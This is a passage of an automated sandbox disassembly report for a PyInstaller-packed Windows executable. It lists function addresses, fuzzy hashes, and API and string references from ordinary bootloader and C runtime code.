Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
Instruction ID: d35eeefd166152853927aff4d450554037e7c2a9dd4d37891fb11b10d93655e6
Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
Instruction Fuzzy Hash: B321B132A04A01CAEB218F64C0862BC37B4EB55319F240636E7AD97AC5EF38E445C780

Function 00007FF6CEB369E4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB36949

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
Instruction ID: 2652b9b8e70ddb6823e30219a624ac5edc96afd37bffc855779a592332923879
Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
Instruction Fuzzy Hash: D811C631A0D64283EA60DF019602279A271AFAAB91F540131FACCA7B8ACF3CD4508741

Function 00007FF6CEB4748C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB474AF

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
Instruction ID: 6ce8bb6860eca078644736556e3d9c64d90e049c82c6b4b0d360a1976451401f
Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
Instruction Fuzzy Hash: 58219D72A08A4287DB618F18E58037976B0EBA5B95F644235F69D976E9DF3CD800CB00

Function 00007FF6CEB30CEC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB30D40

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
Instruction ID: 71157ccc09c466eb2da387ac85a9efef63eeac0a27ceead1465ef911c8048c1a
Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
Instruction Fuzzy Hash: 4C018821A08B4542EA04DF525A02179A7F5BF66FE1F484631FE9CB7BDADE3CE5118300

Function 00007FF6CEB382D4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB38312

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 429e4ff91632884dbfd59807356ed260fa29108cd8906d3b6e9196ad5ea12367
Instruction ID: 93ba07513a132e7cbd40dd57c7f13179e6076a69187e15c5f061b572f0ba7b9a
Opcode Fuzzy Hash: 429e4ff91632884dbfd59807356ed260fa29108cd8906d3b6e9196ad5ea12367
Instruction Fuzzy Hash: 02016D21E0E64282FF646F615743179A2B0AF22792F584235F9DDE37C6CF3CE4424202

Function 00007FF6CEB3F948 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6CEB3C196,?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6), ref: 00007FF6CEB3F99D

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
Instruction ID: f05c5035c8053f234118b12e86c1f2f615f7b692bfdf2bf878d0dfae98a39e28
Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
Instruction Fuzzy Hash: FAF0AF25B0A242A3FE145FA15B533F442B34FA6B82F4C4230E88DE73C5DE1CE4804212

Function 00007FF6CEB3E3AC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF6CEB31514,?,?,?,00007FF6CEB32A26,?,?,?,?,?,00007FF6CEB34019), ref: 00007FF6CEB3E3EA

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
Instruction ID: c25919478729b9203c242637ac6601f8dcfb7a88fbab4ecc61b35ce198f23faa
Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
Instruction Fuzzy Hash: CFF05E01F1E38246FA155F615B5267992B04F66BA2F080631FAAEEB7C1DE2CE4818111

Function 00007FF6CEB38610 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB38629

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5d337e270712d004679ba659ef610f4cb2fc78abe2ab3a8c8a6757f66acf180b
Instruction ID: b9d60aa407f53c8cc7a59bc9c75f30847fbc37a4424ada724db2fc243930b5b1
Opcode Fuzzy Hash: 5d337e270712d004679ba659ef610f4cb2fc78abe2ab3a8c8a6757f66acf180b
Instruction Fuzzy Hash: BCE0EC50E0AA0643FA547EE057C35B911314F7A342F605030FAC8AB3C3DD1CA8949A23

Non-executed Functions

Function 00007FF6CEB27100 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6CEB27117
GetProcAddress.KERNEL32 ref: 00007FF6CEB27156
GetProcAddress.KERNEL32 ref: 00007FF6CEB2717B
GetProcAddress.KERNEL32 ref: 00007FF6CEB271A0
GetProcAddress.KERNEL32 ref: 00007FF6CEB271C8
GetProcAddress.KERNEL32 ref: 00007FF6CEB271F0
GetProcAddress.KERNEL32 ref: 00007FF6CEB27218
GetProcAddress.KERNEL32 ref: 00007FF6CEB27240
GetProcAddress.KERNEL32 ref: 00007FF6CEB27268

Strings

Tcl_EvalEx, xrefs: 00007FF6CEB27506
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF6CEB27392
Failed to get address for Tcl_MutexLock, xrefs: 00007FF6CEB272A2
Tcl_GetVar2, xrefs: 00007FF6CEB2739E
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF6CEB275EA
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF6CEB272F2
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF6CEB27482
Tcl_CreateThread, xrefs: 00007FF6CEB27236
Tcl_GetString, xrefs: 00007FF6CEB27416
Failed to get address for Tcl_GetVar2, xrefs: 00007FF6CEB273BA
Tcl_Alloc, xrefs: 00007FF6CEB27556
Tcl_DoOneEvent, xrefs: 00007FF6CEB27196
Tcl_FinalizeThread, xrefs: 00007FF6CEB271E6
Failed to get address for Tcl_Finalize, xrefs: 00007FF6CEB271DA
Tcl_CreateObjCommand, xrefs: 00007FF6CEB273EE
Tcl_EvalFile, xrefs: 00007FF6CEB274DE
Tcl_NewStringObj, xrefs: 00007FF6CEB2743E
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF6CEB2722A
Failed to get address for Tcl_Free, xrefs: 00007FF6CEB2759A
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF6CEB2718D
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF6CEB2754A
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF6CEB27202
Tcl_ThreadAlert, xrefs: 00007FF6CEB27376
Tcl_ConditionFinalize, xrefs: 00007FF6CEB272D6
Tcl_DeleteInterp, xrefs: 00007FF6CEB2720E
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF6CEB2727A
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF6CEB27168
Tcl_SetVar2, xrefs: 00007FF6CEB273C6
Failed to get address for Tk_Init, xrefs: 00007FF6CEB275C2
Failed to get address for Tcl_EvalFile, xrefs: 00007FF6CEB274FA
Tcl_Free, xrefs: 00007FF6CEB2757E
Tcl_ThreadQueueEvent, xrefs: 00007FF6CEB2734E
GetProcAddress, xrefs: 00007FF6CEB27130
Failed to get address for Tcl_CreateThread, xrefs: 00007FF6CEB27252
Tcl_FindExecutable, xrefs: 00007FF6CEB27171
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF6CEB27342
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF6CEB2745A
Tcl_ConditionNotify, xrefs: 00007FF6CEB272FE
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF6CEB274D2
Tk_GetNumMainWindows, xrefs: 00007FF6CEB275CE
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF6CEB2731A
Failed to get address for Tcl_Alloc, xrefs: 00007FF6CEB27572
Tcl_SetVar2Ex, xrefs: 00007FF6CEB2748E
Tk_Init, xrefs: 00007FF6CEB275A6
Tcl_MutexUnlock, xrefs: 00007FF6CEB272AE
Tcl_NewByteArrayObj, xrefs: 00007FF6CEB27466
Failed to get address for Tcl_Init, xrefs: 00007FF6CEB27129
Tcl_EvalObjv, xrefs: 00007FF6CEB2752E
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF6CEB2740A
Tcl_MutexLock, xrefs: 00007FF6CEB27286
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF6CEB274AA
Tcl_Init, xrefs: 00007FF6CEB27110
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF6CEB271B2
Failed to get address for Tcl_GetString, xrefs: 00007FF6CEB27432
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF6CEB2736A
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF6CEB272CA
Failed to get address for Tcl_SetVar2, xrefs: 00007FF6CEB273E2
Tcl_Finalize, xrefs: 00007FF6CEB271BE
Failed to get address for Tcl_EvalEx, xrefs: 00007FF6CEB27522
Tcl_GetObjResult, xrefs: 00007FF6CEB274B6
Tcl_ConditionWait, xrefs: 00007FF6CEB27326
Tcl_GetCurrentThread, xrefs: 00007FF6CEB2725E
Tcl_CreateInterp, xrefs: 00007FF6CEB2714C

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
Instruction ID: 48266bd12a4bea690f4ffcdd1a9f6fe2f8e80517ae2f42eb6ea9db433b112659
Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
Instruction Fuzzy Hash: BCE1D461E1EB1391FA598F04EA8417423B1AF37753F949436F8CEAA3A4EF7CB5449200

Function 00007FF6CEB44EFC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6CEB44F4A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB455B6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4572C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB459EA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB45C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB45E47
memcpy_s.LIBCPMT ref: 00007FF6CEB45F22
memcpy_s.LIBCPMT ref: 00007FF6CEB45FCD
memcpy_s.LIBCPMT ref: 00007FF6CEB4609C

Strings

1#INF, xrefs: 00007FF6CEB45073
1#QNAN, xrefs: 00007FF6CEB45063
1#IND, xrefs: 00007FF6CEB45037
1#SNAN, xrefs: 00007FF6CEB4505A

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
Instruction ID: 04a965d7b937dfa6a4e5522df267bda26a53ef5130fa3ca2b2586d341e3a5b3b
Opcode Fuzzy Hash: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
Instruction Fuzzy Hash: 72B2F772E196828BE7258F64D7407FD77B1FB6534AF405136EA8DA7A84DF38A900CB40

Function 00007FF6CEB28770 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF6CEB22A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28797
FormatMessageW.KERNEL32 ref: 00007FF6CEB287C6
WideCharToMultiByte.KERNEL32 ref: 00007FF6CEB2881C

Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0

Strings

WideCharToMultiByte, xrefs: 00007FF6CEB2882D
FormatMessageW, xrefs: 00007FF6CEB287D7
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6CEB28826
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF6CEB28839
No error messages generated., xrefs: 00007FF6CEB287D0
PyInstaller: FormatMessageW failed., xrefs: 00007FF6CEB287E3

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
Instruction ID: ef4bbb64a3c4736fd4f0dd39c9b8cf037bb395b633e35c2cc4e81876c2eb5a6d
Opcode Fuzzy Hash: 71548051bea7547f5d5b972cb2661fdb12455c7e02de19cea235076eba1ea75f
Instruction Fuzzy Hash: 9E215631A08A4281F7609F11E9442796375FF7A746F445135F6CDF66A4DF3CE1458700

Function 00007FF6CEB2C8BC Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6CEB2C8D8
RtlCaptureContext.KERNEL32 ref: 00007FF6CEB2C905
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CEB2C91F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CEB2C960
IsDebuggerPresent.KERNEL32 ref: 00007FF6CEB2C9B4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CEB2C9D1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CEB2C9DC

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
Instruction ID: 5637be56caeb381e4f07412b79ba7101719b6558e151d13e3b58271490399124
Opcode Fuzzy Hash: 4f1605a870b3ab58307638b90f69401c730c876d9dfa7ce500e329c816792819
Instruction Fuzzy Hash: DC313E72609A8186EB609F60E8443FD7374FBA5745F04403AEA8D97B99DF38D648CB10

Function 00007FF6CEB3B3CC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6CEB3B445
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CEB3B45D
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CEB3B498
IsDebuggerPresent.KERNEL32 ref: 00007FF6CEB3B4D1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CEB3B4DB
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CEB3B4E6

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
Instruction ID: acb994ba58fc21f652debe7ea6addeff3c4692a9b82afec9a8ee3d9f6b6ed50a
Opcode Fuzzy Hash: f3d77d60e417bce1f0fe908812719be64cab24703666754eed0168e01bd0a785
Instruction Fuzzy Hash: 92315E32608B8186EB60CF25E8812BE73B4FB99759F540136EA8D93B58EF38D555CB00

Function 00007FF6CEB426C4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB42710
FindFirstFileExW.KERNEL32 ref: 00007FF6CEB4281A

Memory Dump Source

Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true

Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
